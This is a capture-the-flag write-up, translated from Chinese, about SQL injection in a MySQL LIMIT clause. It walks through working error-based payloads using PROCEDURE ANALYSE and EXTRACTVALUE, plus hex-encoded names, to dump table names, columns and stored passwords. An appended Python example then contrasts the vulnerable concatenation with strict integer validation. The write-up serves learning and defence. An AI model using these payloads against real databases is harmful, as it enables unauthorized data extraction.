Challenge:
After some study, Xiao Ming finally understood SQL injection: she knows that its root cause is that data and statements are not properly separated, so data ends up being executed as part of the SQL statement. But is being able to control some part of the SQL statement always enough to extract data? After thinking it over, Xiao Ming knew that when the WHERE condition is controllable it is all too easy, but what if the injection lands in the LIMIT clause?
Writeup:
Note up front: since the challenge address is very long, it is written as url below.
Clicking into the challenge takes you to url?start=0&num=1, which displays a single sentence.
- Testing start and num with a few random numbers shows that the num value affects the result. Appending a single quote after the num value produces an error such as: '0,1\''. So the single quote is being escaped (filtered), and start and num are exactly the two operands of LIMIT.
- Try a UNION injection: url?start=0 union select 1%23&num=1
This produces the following error:
Incorrect usage of UNION and ORDER BY Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
In other words, there is an ORDER BY clause ahead of LIMIT in the query, so UNION is a dead end (GG).
- If UNION is out, what next? (Note that the # comment marker is still usable.) A look at the MySQL SELECT syntax online:
SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_condition] [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position} [ASC | DESC], ...] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [INTO OUTFILE 'file_name' export_options | INTO DUMPFILE 'file_name' | INTO var_name [, var_name]] [FOR UPDATE | LOCK IN SHARE MODE]]
So a PROCEDURE clause is allowed after LIMIT. Construct the following request:
?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23&num=1
The response is: XPATH syntax error: 'article,user' Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
So the current database has two tables: article and user.
- Now enumerate the columns of the user table (since quote characters are filtered, the table name has to be supplied as hex-encoded ASCII):
?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23&num=1
The response is: XPATH syntax error: 'id,username,password,lastloginIP' Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
The username column should reveal something: ?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(username) from user))),1)%23&num=1
XPATH syntax error: 'user,admin,flag' Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
There is a suspicious value flag, so the password column should give us the flag:
?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(password) from user))),1)%23&num=1
XPATH syntax error: 'user,admin,myflagishere' Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51
Sure enough, the flag is myflagishere.
Afterword: having only recently started with SQL injection, I spent a long time on this challenge and dug through a lot of material online before learning that this is a LIMIT injection; reference: http://netsecurity.51cto.com/art/201501/464519.htm.
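The root cause in this challenge is that the numeric LIMIT operands are concatenated into the query with quote escaping as the only protection, and a LIMIT payload never needs a quote. As an added illustration (not code from the original writeup or the challenge), the Python/sqlite3 snippet below contrasts that pattern with strict integer validation plus bound parameters; the article table, its columns and the range limits are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the challenge's 'article' table (schema assumed).
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO article (body) VALUES (?)",
                     [("first",), ("second",), ("third",)])
    return conn

def vulnerable_limit_query(start, num):
    """Mirror the challenge's pattern: escape quotes, then concatenate.
    Returns the SQL text that would be sent; an injected LIMIT operand
    needs no quote, so the escaping never fires."""
    start = start.replace("'", "\\'")
    num = num.replace("'", "\\'")
    return f"SELECT body FROM article ORDER BY id LIMIT {start},{num}"

_DIGITS = re.compile(r"[0-9]{1,9}")

def parse_limit_operand(value, upper):
    """Accept only a plain non-negative integer within [0, upper];
    anything else (spaces, keywords, comments, hex literals) is rejected."""
    if not _DIGITS.fullmatch(value):
        raise ValueError(f"LIMIT operand is not an integer: {value!r}")
    n = int(value)
    if n > upper:
        raise ValueError(f"LIMIT operand out of range: {n}")
    return n

def safe_fetch(conn, start, num):
    """Validated operands are bound as integers; the statement text is fixed."""
    offset = parse_limit_operand(start, 10_000)
    count = parse_limit_operand(num, 100)
    cur = conn.execute(
        "SELECT body FROM article ORDER BY id LIMIT ? OFFSET ?", (count, offset))
    return [row[0] for row in cur]

def limit_operand_is_clean(value):
    """Boolean form of the same check, usable when triaging request logs."""
    try:
        parse_limit_operand(value, 10_000)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    db = make_demo_db()
    injected = "0 procedure analyse(1,1)#"   # URL-decoded shape of the 'start' trick above
    print(vulnerable_limit_query(injected, "1"))  # keyword passes the quote filter untouched
    print(limit_operand_is_clean(injected))       # False
    print(safe_fetch(db, "1", "2"))               # ['second', 'third']
```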